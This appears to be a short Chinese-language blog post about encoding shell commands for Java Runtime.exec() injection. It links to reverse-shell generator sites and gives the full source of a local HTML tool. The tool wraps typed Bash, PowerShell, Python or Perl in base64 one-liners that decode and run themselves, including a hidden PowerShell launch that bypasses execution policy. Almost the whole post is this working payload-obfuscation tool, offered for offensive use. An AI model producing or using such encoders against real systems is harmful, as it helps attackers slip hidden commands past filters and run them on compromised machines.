shell编码

https://mrxn.net/reverse_shell.php
https://x.hacking8.com/?post=293
https://tools.zjun.info/reverseshell/
https://www.revshells.com/
java.lang.Runtime.exec()学习了

https://ares-x.com/tools/runtime-exec/
https://www.bugku.net/runtime-exec-payloads/
https://www.yster.live/runtime-exec-payloads/

不如把html保存本地

源码如下,保存文件为bash.html

  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.     <title>java runtime exec usage...</title>
  5. </head>
  6. <body>
  7.     <p>Input type:
  8. <input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>
  9. <input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>
  10. <input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>
  11. <input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p>
  13.     <p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>
  14. <textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>
  16. <script>
  17.   var taInput = document.querySelector('textarea#input');
  18.   var taOutput = document.querySelector('textarea#output');
  20.   function processInput() {
  21.     var option = document.querySelector('input[name="option"]:checked').value;
  23.     switch (option) {
  24.       case 'bash':
  25.         taInput.placeholder = 'Type Bash here...'
  26.         taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';
  27.         break;
  28.       case 'powershell':
  29.         taInput.placeholder = 'Type PowerShell here...'
  30.         poshInput = ''
  31.         for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }
  32.         taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);
  33.         break;
  34.       case 'python':
  35.         taInput.placeholder = 'Type Python here...'
  36.         taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";
  37.         break;
  38.       case 'perl':
  39.         taInput.placeholder = 'Type Perl here...'
  40.         taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";
  41.         break;
  42.       default:
  43.         taOutput.value = ''
  44.     }
  46.     if (!taInput.value) taOutput.value = '';
  47.   }
  49.   taInput.addEventListener('input', processInput, false);
  50. </script>
  52. </body>
  53. </html>